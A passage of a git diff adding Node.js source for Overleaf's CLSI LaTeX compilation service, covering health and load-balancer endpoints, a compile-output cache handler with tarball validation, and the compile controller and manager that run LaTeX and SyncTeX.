false +if (Settings.processLifespanLimitMs) { + // Pre-emp instances have a maximum lifespan of 24h after which they will be + // shutdown, with a 30s grace period. + // Spread cycling of VMs by up-to 2.4h _before_ their limit to avoid large + // numbers of VMs that are temporarily unavailable (while they reboot). 
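+  // For example, with the 24h limit mentioned above, the line below subtracts
+  // a uniformly random 0-10% of the limit, giving each instance an effective
+  // lifespan somewhere between 21.6h and 24h.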
+  Settings.processLifespanLimitMs -=
+    Settings.processLifespanLimitMs * (Math.random() / 10)
+  logger.info(
+    { target: new Date(Date.now() + Settings.processLifespanLimitMs) },
+    'Lifespan limited'
+  )
+
+  setTimeout(() => {
+    logger.info({}, 'shutting down, process is too old')
+    Settings.processTooOld = true
+  }, Settings.processLifespanLimitMs)
+}
+
+function runSmokeTest() {
+  if (Settings.processTooOld) return
+  const INTERVAL = 30 * 1000
+  if (
+    smokeTest.lastRunSuccessful() &&
+    CompileController.timeSinceLastSuccessfulCompile() < INTERVAL / 2
+  ) {
+    logger.debug('skipping smoke tests, got recent successful user compile')
+    return setTimeout(runSmokeTest, INTERVAL / 2)
+  }
+  logger.debug('running smoke tests')
+  smokeTest.triggerRun(err => {
+    if (err) logger.error({ err }, 'smoke tests failed')
+    setTimeout(runSmokeTest, INTERVAL)
+  })
+}
+if (Settings.smokeTest) {
+  runSmokeTest()
+}
+
+app.get('/health_check', function (req, res) {
+  if (Settings.processTooOld) {
+    return res.status(500).json({ processTooOld: true })
+  }
+  smokeTest.sendLastResult(res)
+})
+
+app.get('/smoke_test_force', (req, res) => smokeTest.sendNewResult(res))
+
+app.use(function (error, req, res, next) {
+  if (error instanceof Errors.NotFoundError) {
+    logger.debug({ err: error, url: req.url }, 'not found error')
+    res.sendStatus(404)
+  } else if (error instanceof Errors.InvalidParameter) {
+    res.status(400).send(error.message)
+  } else if (error.code === 'EPIPE') {
+    // inspect container returns EPIPE when shutting down
+    res.sendStatus(503) // send 503 Unavailable response
+  } else {
+    logger.error({ err: error, url: req.url }, 'server error')
+    res.sendStatus(error.statusCode || 500)
+  }
+})
+
+const net = require('node:net')
+const os = require('node:os')
+
+let STATE = 'up'
+
+const loadTcpServer = net.createServer(function (socket) {
+  socket.on('error', function (err) {
+    if (err.code === 'ECONNRESET') {
+      // this always comes up, we don't know why
+      return
+    }
+    logger.err({ err }, 'error with socket on load check')
+    socket.destroy()
+  })
+
+  if (STATE === 'up' && Settings.internal.load_balancer_agent.report_load) {
+    let availableWorkingCpus
+    const currentLoad = os.loadavg()[0]
+
+    // staging CLSIs have 1 cpu core only
+    if (os.cpus().length === 1) {
+      availableWorkingCpus = 1
+    } else {
+      availableWorkingCpus = os.cpus().length - 1
+    }
+
+    const freeLoad = availableWorkingCpus - currentLoad
+    const freeLoadPercentage = Math.round(
+      (freeLoad / availableWorkingCpus) * 100
+    )
+    if (
+      Settings.internal.load_balancer_agent.allow_maintenance &&
+      freeLoadPercentage <= 0
+    ) {
+      // When it's 0 the server is set to drain implicitly.
+      // Drain will move new projects to different servers.
+      // Drain will keep existing projects assigned to the same server.
+      // Maint will move existing and new projects to different servers.
+      socket.write(`maint, 0%\n`, 'ASCII')
+    } else {
+      // Ready will cancel the maint state.
+      socket.write(`up, ready, ${Math.max(freeLoadPercentage, 1)}%\n`, 'ASCII')
+      if (freeLoadPercentage <= 0) {
+        // This metric records how often we would have gone into maintenance mode.
+ Metrics.inc('clsi-prevented-maint') + } + } + socket.end() + } else { + socket.write(`${STATE}\n`, 'ASCII') + socket.end() + } +}) + +const loadHttpServer = express() + +loadHttpServer.post('/state/up', function (req, res, next) { + STATE = 'up' + logger.debug('getting message to set server to down') + res.sendStatus(204) +}) + +loadHttpServer.post('/state/down', function (req, res, next) { + STATE = 'down' + logger.debug('getting message to set server to down') + res.sendStatus(204) +}) + +loadHttpServer.post('/state/maint', function (req, res, next) { + STATE = 'maint' + logger.debug('getting message to set server to maint') + res.sendStatus(204) +}) + +const port = Settings.internal.clsi.port +const host = Settings.internal.clsi.host + +const loadTcpPort = Settings.internal.load_balancer_agent.load_port +const loadHttpPort = Settings.internal.load_balancer_agent.local_port + +if (!module.parent) { + // Called directly + + // handle uncaught exceptions when running in production + if (Settings.catchErrors) { + process.removeAllListeners('uncaughtException') + process.on('uncaughtException', error => + logger.error({ err: error }, 'uncaughtException') + ) + } + + app.listen(port, host, error => { + if (error) { + logger.fatal({ error }, `Error starting CLSI on ${host}:${port}`) + } else { + logger.debug(`CLSI starting up, listening on ${host}:${port}`) + } + }) + + loadTcpServer.listen(loadTcpPort, host, function (error) { + if (error != null) { + throw error + } + logger.debug(`Load tcp agent listening on load port ${loadTcpPort}`) + }) + + loadHttpServer.listen(loadHttpPort, host, function (error) { + if (error != null) { + throw error + } + logger.debug(`Load http agent listening on load port ${loadHttpPort}`) + }) +} + +module.exports = app diff --git a/services/clsi/app/js/CLSICacheHandler.js b/services/clsi/app/js/CLSICacheHandler.js new file mode 100644 index 0000000..de6f512 --- /dev/null +++ b/services/clsi/app/js/CLSICacheHandler.js @@ -0,0 +1,276 @@ +const crypto = require('node:crypto') +const fs = require('node:fs') +const Path = require('node:path') +const { pipeline } = require('node:stream/promises') +const { createGzip, createGunzip } = require('node:zlib') +const tarFs = require('tar-fs') +const _ = require('lodash') +const { + fetchNothing, + fetchStream, + RequestFailedError, +} = require('@overleaf/fetch-utils') +const logger = require('@overleaf/logger') +const Metrics = require('@overleaf/metrics') +const Settings = require('@overleaf/settings') +const { CACHE_SUBDIR } = require('./OutputCacheManager') +const { isExtraneousFile } = require('./ResourceWriter') + +const TIMING_BUCKETS = [ + 0, 10, 100, 1000, 2000, 5000, 10000, 15000, 20000, 30000, +] +const MAX_ENTRIES_IN_OUTPUT_TAR = 100 + +/** + * @param {string} projectId + * @param {string} userId + * @param {string} buildId + * @param {string} editorId + * @param {[{path: string}]} outputFiles + * @param {string} compileGroup + * @param {Record} options + */ +function notifyCLSICacheAboutBuild({ + projectId, + userId, + buildId, + editorId, + outputFiles, + compileGroup, + options, +}) { + if (!Settings.apis.clsiCache.enabled) return + + /** + * @param {[{path: string}]} files + */ + const enqueue = files => { + Metrics.count('clsi_cache_enqueue_files', files.length) + fetchNothing(`${Settings.apis.clsiCache.url}/enqueue`, { + method: 'POST', + json: { + projectId, + userId, + buildId, + editorId, + files, + downloadHost: Settings.apis.clsi.downloadHost, + clsiServerId: Settings.apis.clsi.clsiServerId, + 
compileGroup, + options, + }, + signal: AbortSignal.timeout(15_000), + }).catch(err => { + logger.warn( + { err, projectId, userId, buildId }, + 'enqueue for clsi cache failed' + ) + }) + } + + // PDF preview + enqueue( + outputFiles + .filter( + f => + f.path === 'output.pdf' || + f.path === 'output.log' || + f.path === 'output.synctex.gz' || + f.path.endsWith('.blg') + ) + .map(f => { + if (f.path === 'output.pdf') { + return _.pick(f, 'path', 'size', 'contentId', 'ranges') + } + return _.pick(f, 'path') + }) + ) + + // Compile Cache + buildTarball({ projectId, userId, buildId, outputFiles }) + .then(() => { + enqueue([{ path: 'output.tar.gz' }]) + }) + .catch(err => { + logger.warn( + { err, projectId, userId, buildId }, + 'build output.tar.gz for clsi cache failed' + ) + }) +} + +/** + * @param {string} projectId + * @param {string} userId + * @param {string} buildId + * @param {[{path: string}]} outputFiles + * @return {Promise} + */ +async function buildTarball({ projectId, userId, buildId, outputFiles }) { + const timer = new Metrics.Timer('clsi_cache_build', 1, {}, TIMING_BUCKETS) + const outputDir = Path.join( + Settings.path.outputDir, + userId ? `${projectId}-${userId}` : projectId, + CACHE_SUBDIR, + buildId + ) + + const files = outputFiles.filter(f => !isExtraneousFile(f.path)) + if (files.length > MAX_ENTRIES_IN_OUTPUT_TAR) { + Metrics.inc('clsi_cache_build_too_many_entries') + throw new Error('too many output files for output.tar.gz') + } + Metrics.count('clsi_cache_build_files', files.length) + + const path = Path.join(outputDir, 'output.tar.gz') + try { + await pipeline( + tarFs.pack(outputDir, { entries: files.map(f => f.path) }), + createGzip(), + fs.createWriteStream(path) + ) + } catch (err) { + try { + await fs.promises.unlink(path) + } catch (e) {} + throw err + } finally { + timer.done() + } +} + +/** + * @param {string} projectId + * @param {string} userId + * @param {string} editorId + * @param {string} buildId + * @param {string} outputDir + * @return {Promise} + */ +async function downloadOutputDotSynctexFromCompileCache( + projectId, + userId, + editorId, + buildId, + outputDir +) { + if (!Settings.apis.clsiCache.enabled) return false + + const timer = new Metrics.Timer( + 'clsi_cache_download', + 1, + { method: 'synctex' }, + TIMING_BUCKETS + ) + let stream + try { + stream = await fetchStream( + `${Settings.apis.clsiCache.url}/project/${projectId}/${ + userId ? `user/${userId}/` : '' + }build/${editorId}-${buildId}/search/output/output.synctex.gz`, + { + method: 'GET', + signal: AbortSignal.timeout(10_000), + } + ) + } catch (err) { + if (err instanceof RequestFailedError && err.response.status === 404) { + timer.done({ status: 'not-found' }) + return false + } + timer.done({ status: 'error' }) + throw err + } + await fs.promises.mkdir(outputDir, { recursive: true }) + const dst = Path.join(outputDir, 'output.synctex.gz') + const tmp = dst + crypto.randomUUID() + try { + await pipeline(stream, fs.createWriteStream(tmp)) + await fs.promises.rename(tmp, dst) + } catch (err) { + try { + await fs.promises.unlink(tmp) + } catch {} + throw err + } + timer.done({ status: 'success' }) + return true +} + +/** + * @param {string} projectId + * @param {string} userId + * @param {string} compileDir + * @return {Promise} + */ +async function downloadLatestCompileCache(projectId, userId, compileDir) { + if (!Settings.apis.clsiCache.enabled) return false + + const url = `${Settings.apis.clsiCache.url}/project/${projectId}/${ + userId ? 
`user/${userId}/` : '' + }latest/output/output.tar.gz` + const timer = new Metrics.Timer( + 'clsi_cache_download', + 1, + { method: 'tar' }, + TIMING_BUCKETS + ) + let stream + try { + stream = await fetchStream(url, { + method: 'GET', + signal: AbortSignal.timeout(10_000), + }) + } catch (err) { + if (err instanceof RequestFailedError && err.response.status === 404) { + timer.done({ status: 'not-found' }) + return false + } + timer.done({ status: 'error' }) + throw err + } + let n = 0 + let abort = false + await pipeline( + stream, + createGunzip(), + tarFs.extract(compileDir, { + // use ignore hook for counting entries (files+folders) and validation. + // Include folders as they incur mkdir calls. + ignore(_, header) { + if (abort) return true // log once + n++ + if (n > MAX_ENTRIES_IN_OUTPUT_TAR) { + abort = true + logger.warn( + { + url, + compileDir, + }, + 'too many entries in tar-ball from clsi-cache' + ) + } else if (header.type !== 'file' && header.type !== 'directory') { + abort = true + logger.warn( + { + url, + compileDir, + entryType: header.type, + }, + 'unexpected entry in tar-ball from clsi-cache' + ) + } + return abort + }, + }) + ) + Metrics.count('clsi_cache_download_entries', n) + timer.done({ status: 'success' }) + return !abort +} + +module.exports = { + notifyCLSICacheAboutBuild, + downloadLatestCompileCache, + downloadOutputDotSynctexFromCompileCache, +} diff --git a/services/clsi/app/js/CommandRunner.js b/services/clsi/app/js/CommandRunner.js new file mode 100644 index 0000000..61d58dd --- /dev/null +++ b/services/clsi/app/js/CommandRunner.js @@ -0,0 +1,20 @@ +// TODO: This file was created by bulk-decaffeinate. +// Sanity-check the conversion and remove this comment. +/* + * decaffeinate suggestions: + * DS207: Consider shorter variations of null checks + * Full docs: https://github.com/decaffeinate/decaffeinate/blob/master/docs/suggestions.md + */ +let commandRunnerPath +const Settings = require('@overleaf/settings') +const logger = require('@overleaf/logger') + +if ((Settings.clsi != null ? 
Settings.clsi.dockerRunner : undefined) === true) { + commandRunnerPath = './DockerRunner' +} else { + commandRunnerPath = './LocalCommandRunner' +} +logger.debug({ commandRunnerPath }, 'selecting command runner for clsi') +const CommandRunner = require(commandRunnerPath) + +module.exports = CommandRunner diff --git a/services/clsi/app/js/CompileController.js b/services/clsi/app/js/CompileController.js new file mode 100644 index 0000000..87a7db6 --- /dev/null +++ b/services/clsi/app/js/CompileController.js @@ -0,0 +1,276 @@ +const Path = require('node:path') +const RequestParser = require('./RequestParser') +const CompileManager = require('./CompileManager') +const Settings = require('@overleaf/settings') +const Metrics = require('./Metrics') +const ProjectPersistenceManager = require('./ProjectPersistenceManager') +const logger = require('@overleaf/logger') +const Errors = require('./Errors') +const { notifyCLSICacheAboutBuild } = require('./CLSICacheHandler') + +let lastSuccessfulCompileTimestamp = 0 + +function timeSinceLastSuccessfulCompile() { + return Date.now() - lastSuccessfulCompileTimestamp +} + +function compile(req, res, next) { + const timer = new Metrics.Timer('compile-request') + RequestParser.parse(req.body, function (error, request) { + if (error) { + return next(error) + } + timer.opts = request.metricsOpts + request.project_id = req.params.project_id + if (req.params.user_id != null) { + request.user_id = req.params.user_id + } + ProjectPersistenceManager.markProjectAsJustAccessed( + request.project_id, + function (error) { + if (error) { + return next(error) + } + const stats = {} + const timings = {} + CompileManager.doCompileWithLock( + request, + stats, + timings, + (error, result) => { + let { buildId, outputFiles } = result || {} + let code, status + if (outputFiles == null) { + outputFiles = [] + } + if (error instanceof Errors.AlreadyCompilingError) { + code = 423 // Http 423 Locked + status = 'compile-in-progress' + } else if (error instanceof Errors.FilesOutOfSyncError) { + code = 409 // Http 409 Conflict + status = 'retry' + logger.warn( + { + projectId: request.project_id, + userId: request.user_id, + }, + 'files out of sync, please retry' + ) + } else if ( + error?.code === 'EPIPE' || + error instanceof Errors.TooManyCompileRequestsError + ) { + // docker returns EPIPE when shutting down + code = 503 // send 503 Unavailable response + status = 'unavailable' + } else if (error?.terminated) { + status = 'terminated' + } else if (error?.validate) { + status = `validation-${error.validate}` + } else if (error?.timedout) { + status = 'timedout' + logger.debug( + { err: error, projectId: request.project_id }, + 'timeout running compile' + ) + } else if (error) { + status = 'error' + code = 500 + logger.error( + { err: error, projectId: request.project_id }, + 'error running compile' + ) + } else { + if ( + outputFiles.some( + file => file.path === 'output.pdf' && file.size > 0 + ) + ) { + status = 'success' + lastSuccessfulCompileTimestamp = Date.now() + } else if (request.stopOnFirstError) { + status = 'stopped-on-first-error' + } else { + status = 'failure' + logger.warn( + { projectId: request.project_id, outputFiles }, + 'project failed to compile successfully, no output.pdf generated' + ) + } + + // log an error if any core files are found + if (outputFiles.some(file => file.path === 'core')) { + logger.error( + { projectId: request.project_id, req, outputFiles }, + 'core file found in output' + ) + } + } + + if (error) { + outputFiles = error.outputFiles || 
[] + buildId = error.buildId + } + + if ( + status === 'success' && + request.editorId && + request.populateClsiCache + ) { + notifyCLSICacheAboutBuild({ + projectId: request.project_id, + userId: request.user_id, + buildId: outputFiles[0].build, + editorId: request.editorId, + outputFiles, + compileGroup: request.compileGroup, + options: { + compiler: request.compiler, + draft: request.draft, + imageName: request.imageName + ? Path.basename(request.imageName) + : undefined, + rootResourcePath: request.rootResourcePath, + stopOnFirstError: request.stopOnFirstError, + }, + }) + } + + timer.done() + res.status(code || 200).send({ + compile: { + status, + error: error?.message || error, + stats, + timings, + buildId, + outputUrlPrefix: Settings.apis.clsi.outputUrlPrefix, + outputFiles: outputFiles.map(file => ({ + url: + `${Settings.apis.clsi.url}/project/${request.project_id}` + + (request.user_id != null + ? `/user/${request.user_id}` + : '') + + `/build/${file.build}/output/${file.path}`, + ...file, + })), + }, + }) + } + ) + } + ) + }) +} + +function stopCompile(req, res, next) { + const { project_id: projectId, user_id: userId } = req.params + CompileManager.stopCompile(projectId, userId, function (error) { + if (error) { + return next(error) + } + res.sendStatus(204) + }) +} + +function clearCache(req, res, next) { + ProjectPersistenceManager.clearProject( + req.params.project_id, + req.params.user_id, + function (error) { + if (error) { + return next(error) + } + // No content + res.sendStatus(204) + } + ) +} + +function syncFromCode(req, res, next) { + const { file, editorId, buildId, compileFromClsiCache } = req.query + const line = parseInt(req.query.line, 10) + const column = parseInt(req.query.column, 10) + const { imageName } = req.query + const projectId = req.params.project_id + const userId = req.params.user_id + CompileManager.syncFromCode( + projectId, + userId, + file, + line, + column, + { imageName, editorId, buildId, compileFromClsiCache }, + function (error, pdfPositions) { + if (error) { + return next(error) + } + res.json({ + pdf: pdfPositions, + }) + } + ) +} + +function syncFromPdf(req, res, next) { + const page = parseInt(req.query.page, 10) + const h = parseFloat(req.query.h) + const v = parseFloat(req.query.v) + const { imageName, editorId, buildId, compileFromClsiCache } = req.query + const projectId = req.params.project_id + const userId = req.params.user_id + CompileManager.syncFromPdf( + projectId, + userId, + page, + h, + v, + { imageName, editorId, buildId, compileFromClsiCache }, + function (error, codePositions) { + if (error) { + return next(error) + } + res.json({ + code: codePositions, + }) + } + ) +} + +function wordcount(req, res, next) { + const file = req.query.file || 'main.tex' + const projectId = req.params.project_id + const userId = req.params.user_id + const { image } = req.query + logger.debug({ image, file, projectId }, 'word count request') + + CompileManager.wordcount( + projectId, + userId, + file, + image, + function (error, result) { + if (error) { + return next(error) + } + res.json({ + texcount: result, + }) + } + ) +} + +function status(req, res, next) { + res.send('OK') +} + +module.exports = { + compile, + stopCompile, + clearCache, + syncFromCode, + syncFromPdf, + wordcount, + status, + timeSinceLastSuccessfulCompile, +} diff --git a/services/clsi/app/js/CompileManager.js b/services/clsi/app/js/CompileManager.js new file mode 100644 index 0000000..b65fb3c --- /dev/null +++ b/services/clsi/app/js/CompileManager.js @@ -0,0 +1,701 
@@ +const fsPromises = require('node:fs/promises') +const os = require('node:os') +const Path = require('node:path') +const { callbackify } = require('node:util') + +const Settings = require('@overleaf/settings') +const logger = require('@overleaf/logger') +const OError = require('@overleaf/o-error') + +const ResourceWriter = require('./ResourceWriter') +const LatexRunner = require('./LatexRunner') +const OutputFileFinder = require('./OutputFileFinder') +const OutputCacheManager = require('./OutputCacheManager') +const Metrics = require('./Metrics') +const DraftModeManager = require('./DraftModeManager') +const TikzManager = require('./TikzManager') +const LockManager = require('./LockManager') +const Errors = require('./Errors') +const CommandRunner = require('./CommandRunner') +const { emitPdfStats } = require('./ContentCacheMetrics') +const SynctexOutputParser = require('./SynctexOutputParser') +const { + downloadLatestCompileCache, + downloadOutputDotSynctexFromCompileCache, +} = require('./CLSICacheHandler') + +const COMPILE_TIME_BUCKETS = [ + // NOTE: These buckets are locked in per metric name. + // If you want to change them, you will need to rename metrics. + 0, 1, 2, 3, 4, 6, 8, 11, 15, 22, 31, 43, 61, 86, 121, 170, 240, +].map(seconds => seconds * 1000) + +function getCompileName(projectId, userId) { + if (userId != null) { + return `${projectId}-${userId}` + } else { + return projectId + } +} + +function getCompileDir(projectId, userId) { + return Path.join(Settings.path.compilesDir, getCompileName(projectId, userId)) +} + +function getOutputDir(projectId, userId) { + return Path.join(Settings.path.outputDir, getCompileName(projectId, userId)) +} + +async function doCompileWithLock(request, stats, timings) { + const compileDir = getCompileDir(request.project_id, request.user_id) + request.isInitialCompile = + (await fsPromises.mkdir(compileDir, { recursive: true })) === compileDir + // prevent simultaneous compiles + const lock = LockManager.acquire(compileDir) + try { + return await doCompile(request, stats, timings) + } finally { + lock.release() + } +} + +async function doCompile(request, stats, timings) { + const { project_id: projectId, user_id: userId } = request + const compileDir = getCompileDir(request.project_id, request.user_id) + + const timerE2E = new Metrics.Timer( + 'compile-e2e-v2', + 1, + request.metricsOpts, + COMPILE_TIME_BUCKETS + ) + if (request.isInitialCompile) { + stats.isInitialCompile = 1 + request.metricsOpts.compile = 'initial' + if (request.compileFromClsiCache) { + try { + if (await downloadLatestCompileCache(projectId, userId, compileDir)) { + stats.restoredClsiCache = 1 + request.metricsOpts.compile = 'from-clsi-cache' + } + } catch (err) { + logger.warn( + { err, projectId, userId }, + 'failed to populate compile dir from cache' + ) + } + } + } else { + request.metricsOpts.compile = 'recompile' + } + const writeToDiskTimer = new Metrics.Timer( + 'write-to-disk', + 1, + request.metricsOpts + ) + logger.debug( + { projectId: request.project_id, userId: request.user_id }, + 'syncing resources to disk' + ) + + let resourceList + try { + // NOTE: resourceList is insecure, it should only be used to exclude files from the output list + resourceList = await ResourceWriter.promises.syncResourcesToDisk( + request, + compileDir + ) + } catch (error) { + if (error instanceof Errors.FilesOutOfSyncError) { + OError.tag(error, 'files out of sync, please retry', { + projectId: request.project_id, + userId: request.user_id, + }) + } else { + OError.tag(error, 
'error writing resources to disk', { + projectId: request.project_id, + userId: request.user_id, + }) + } + throw error + } + logger.debug( + { + projectId: request.project_id, + userId: request.user_id, + timeTaken: Date.now() - writeToDiskTimer.start, + }, + 'written files to disk' + ) + timings.sync = writeToDiskTimer.done() + + // set up environment variables for chktex + const env = { + OVERLEAF_PROJECT_ID: request.project_id, + } + if (Settings.texliveOpenoutAny && Settings.texliveOpenoutAny !== '') { + // override default texlive openout_any environment variable + env.openout_any = Settings.texliveOpenoutAny + } + if (Settings.texliveMaxPrintLine && Settings.texliveMaxPrintLine !== '') { + // override default texlive max_print_line environment variable + env.max_print_line = Settings.texliveMaxPrintLine + } + // only run chktex on LaTeX files (not knitr .Rtex files or any others) + const isLaTeXFile = request.rootResourcePath?.match(/\.tex$/i) + if (request.check != null && isLaTeXFile) { + env.CHKTEX_OPTIONS = '-nall -e9 -e10 -w15 -w16' + env.CHKTEX_ULIMIT_OPTIONS = '-t 5 -v 64000' + if (request.check === 'error') { + env.CHKTEX_EXIT_ON_ERROR = 1 + } + if (request.check === 'validate') { + env.CHKTEX_VALIDATE = 1 + } + } + + // apply a series of file modifications/creations for draft mode and tikz + if (request.draft) { + await DraftModeManager.promises.injectDraftMode( + Path.join(compileDir, request.rootResourcePath) + ) + } + + const needsMainFile = await TikzManager.promises.checkMainFile( + compileDir, + request.rootResourcePath, + resourceList + ) + if (needsMainFile) { + await TikzManager.promises.injectOutputFile( + compileDir, + request.rootResourcePath + ) + } + + const compileTimer = new Metrics.Timer('run-compile', 1, request.metricsOpts) + // find the image tag to log it as a metric, e.g. 2015.1 (convert . to - for graphite) + let tag = 'default' + if (request.imageName != null) { + const match = request.imageName.match(/:(.*)/) + if (match != null) { + tag = match[1].replace(/\./g, '-') + } + } + // exclude smoke test + if (!request.project_id.match(/^[0-9a-f]{24}$/)) { + tag = 'other' + } + Metrics.inc('compiles', 1, request.metricsOpts) + Metrics.inc(`compiles-with-image.${tag}`, 1, request.metricsOpts) + const compileName = getCompileName(request.project_id, request.user_id) + + try { + await LatexRunner.promises.runLatex(compileName, { + directory: compileDir, + mainFile: request.rootResourcePath, + compiler: request.compiler, + timeout: request.timeout, + image: request.imageName, + flags: request.flags, + environment: env, + compileGroup: request.compileGroup, + stopOnFirstError: request.stopOnFirstError, + stats, + timings, + }) + + // We use errors to return the validation state. It would be nice to use a + // more appropriate mechanism. + if (request.check === 'validate') { + const validationError = new Error('validation') + validationError.validate = 'pass' + throw validationError + } + } catch (originalError) { + let error = originalError + // request was for validation only + if (request.check === 'validate' && !error.validate) { + error = new Error('validation') + error.validate = originalError.code ? 
'fail' : 'pass' + } + + // request was for compile, and failed on validation + if (request.check === 'error' && originalError.message === 'exited') { + error = new Error('compilation') + error.validate = 'fail' + } + + // record timeout errors as a separate counter, success is recorded later + if (error.timedout) { + Metrics.inc('compiles-timeout', 1, request.metricsOpts) + } + + const { outputFiles, allEntries, buildId } = await _saveOutputFiles({ + request, + compileDir, + resourceList, + stats, + timings, + }) + error.outputFiles = outputFiles // return output files so user can check logs + error.buildId = buildId + // Clear project if this compile was abruptly terminated + if (error.terminated || error.timedout) { + await clearProjectWithListing( + request.project_id, + request.user_id, + allEntries + ) + } + + throw error + } + + // compile completed normally + Metrics.inc('compiles-succeeded', 1, request.metricsOpts) + for (const metricKey in stats) { + const metricValue = stats[metricKey] + Metrics.count(metricKey, metricValue, 1, request.metricsOpts) + } + for (const metricKey in timings) { + const metricValue = timings[metricKey] + Metrics.timing(metricKey, metricValue, 1, request.metricsOpts) + } + const loadavg = typeof os.loadavg === 'function' ? os.loadavg() : undefined + if (loadavg != null) { + Metrics.gauge('load-avg', loadavg[0]) + } + const ts = compileTimer.done() + logger.debug( + { + projectId: request.project_id, + userId: request.user_id, + timeTaken: ts, + stats, + timings, + loadavg, + }, + 'done compile' + ) + if (stats['latex-runs'] > 0) { + Metrics.histogram( + 'avg-compile-per-pass-v2', + ts / stats['latex-runs'], + COMPILE_TIME_BUCKETS, + request.metricsOpts + ) + Metrics.timing( + 'avg-compile-per-pass-v2', + ts / stats['latex-runs'], + 1, + request.metricsOpts + ) + } + if (stats['latex-runs'] > 0 && timings['cpu-time'] > 0) { + Metrics.timing( + 'run-compile-cpu-time-per-pass', + timings['cpu-time'] / stats['latex-runs'], + 1, + request.metricsOpts + ) + } + // Emit compile time. + timings.compile = ts + + const { outputFiles, buildId } = await _saveOutputFiles({ + request, + compileDir, + resourceList, + stats, + timings, + }) + + // Emit e2e compile time. 
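+  // (timings now holds sync, compile and output, set above and inside
+  // _saveOutputFiles; compileE2E below spans the whole request)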
+ timings.compileE2E = timerE2E.done() + Metrics.timing('compile-e2e-v2', timings.compileE2E, 1, request.metricsOpts) + + if (stats['pdf-size']) { + emitPdfStats(stats, timings, request) + } + + return { outputFiles, buildId } +} + +async function _saveOutputFiles({ + request, + compileDir, + resourceList, + stats, + timings, +}) { + const timer = new Metrics.Timer( + 'process-output-files', + 1, + request.metricsOpts + ) + const outputDir = getOutputDir(request.project_id, request.user_id) + + const { outputFiles: rawOutputFiles, allEntries } = + await OutputFileFinder.promises.findOutputFiles(resourceList, compileDir) + + const { buildId, outputFiles } = + await OutputCacheManager.promises.saveOutputFiles( + { request, stats, timings }, + rawOutputFiles, + compileDir, + outputDir + ) + + timings.output = timer.done() + return { outputFiles, allEntries, buildId } +} + +async function stopCompile(projectId, userId) { + const compileName = getCompileName(projectId, userId) + await LatexRunner.promises.killLatex(compileName) +} + +async function clearProject(projectId, userId) { + const compileDir = getCompileDir(projectId, userId) + await fsPromises.rm(compileDir, { force: true, recursive: true }) +} + +async function clearProjectWithListing(projectId, userId, allEntries) { + const compileDir = getCompileDir(projectId, userId) + + const exists = await _checkDirectory(compileDir) + if (!exists) { + // skip removal if no directory present + return + } + + for (const pathInProject of allEntries) { + const path = Path.join(compileDir, pathInProject) + if (path.endsWith('/')) { + await fsPromises.rmdir(path) + } else { + await fsPromises.unlink(path) + } + } + await fsPromises.rmdir(compileDir) +} + +async function _findAllDirs() { + const root = Settings.path.compilesDir + const files = await fsPromises.readdir(root) + const allDirs = files.map(file => Path.join(root, file)) + return allDirs +} + +async function clearExpiredProjects(maxCacheAgeMs) { + const now = Date.now() + const dirs = await _findAllDirs() + for (const dir of dirs) { + let stats + try { + stats = await fsPromises.stat(dir) + } catch (err) { + // ignore errors checking directory + continue + } + + const age = now - stats.mtime + const hasExpired = age > maxCacheAgeMs + if (hasExpired) { + await fsPromises.rm(dir, { force: true, recursive: true }) + } + } +} + +async function _checkDirectory(compileDir) { + let stats + try { + stats = await fsPromises.lstat(compileDir) + } catch (err) { + if (err.code === 'ENOENT') { + // directory does not exist + return false + } + OError.tag(err, 'error on stat of project directory for removal', { + dir: compileDir, + }) + throw err + } + if (!stats.isDirectory()) { + throw new OError('project directory is not directory', { + dir: compileDir, + stats, + }) + } + return true +} + +async function syncFromCode(projectId, userId, filename, line, column, opts) { + // If LaTeX was run in a virtual environment, the file path that synctex expects + // might not match the file path on the host. The .synctex.gz file however, will be accessed + // wherever it is on the host. 
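+  // e.g. (illustrative) syncing from line 12, column 5 of chapter/intro.tex
+  // runs: synctex view -i 12:5:<baseDir>/chapter/intro.tex -o <baseDir>/output.pdf
+  // where <baseDir> comes from Settings.path.synctexBaseDir below.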
+ const compileName = getCompileName(projectId, userId) + const baseDir = Settings.path.synctexBaseDir(compileName) + const inputFilePath = Path.join(baseDir, filename) + const outputFilePath = Path.join(baseDir, 'output.pdf') + const command = [ + 'synctex', + 'view', + '-i', + `${line}:${column}:${inputFilePath}`, + '-o', + outputFilePath, + ] + const stdout = await _runSynctex(projectId, userId, command, opts) + logger.debug( + { projectId, userId, filename, line, column, command, stdout }, + 'synctex code output' + ) + return SynctexOutputParser.parseViewOutput(stdout) +} + +async function syncFromPdf(projectId, userId, page, h, v, opts) { + const compileName = getCompileName(projectId, userId) + const baseDir = Settings.path.synctexBaseDir(compileName) + const outputFilePath = `${baseDir}/output.pdf` + const command = [ + 'synctex', + 'edit', + '-o', + `${page}:${h}:${v}:${outputFilePath}`, + ] + const stdout = await _runSynctex(projectId, userId, command, opts) + logger.debug({ projectId, userId, page, h, v, stdout }, 'synctex pdf output') + return SynctexOutputParser.parseEditOutput(stdout, baseDir) +} + +async function _checkFileExists(dir, filename) { + try { + await fsPromises.stat(dir) + } catch (error) { + if (error.code === 'ENOENT') { + throw new Errors.NotFoundError('no output directory') + } + throw error + } + + const file = Path.join(dir, filename) + let stats + try { + stats = await fsPromises.stat(file) + } catch (error) { + if (error.code === 'ENOENT') { + throw new Errors.NotFoundError('no output file') + } + } + if (!stats.isFile()) { + throw new Error('not a file') + } +} + +async function _runSynctex(projectId, userId, command, opts) { + const { imageName, editorId, buildId, compileFromClsiCache } = opts + + if (imageName && !_isImageNameAllowed(imageName)) { + throw new Errors.InvalidParameter('invalid image') + } + if (editorId && !/^[a-f0-9-]+$/.test(editorId)) { + throw new Errors.InvalidParameter('invalid editorId') + } + if (buildId && !OutputCacheManager.BUILD_REGEX.test(buildId)) { + throw new Errors.InvalidParameter('invalid buildId') + } + + const outputDir = getOutputDir(projectId, userId) + const runInOutputDir = buildId && CommandRunner.canRunSyncTeXInOutputDir() + + const directory = runInOutputDir + ? Path.join(outputDir, OutputCacheManager.CACHE_SUBDIR, buildId) + : getCompileDir(projectId, userId) + const timeout = 60 * 1000 // increased to allow for large projects + const compileName = getCompileName(projectId, userId) + const compileGroup = runInOutputDir ? 
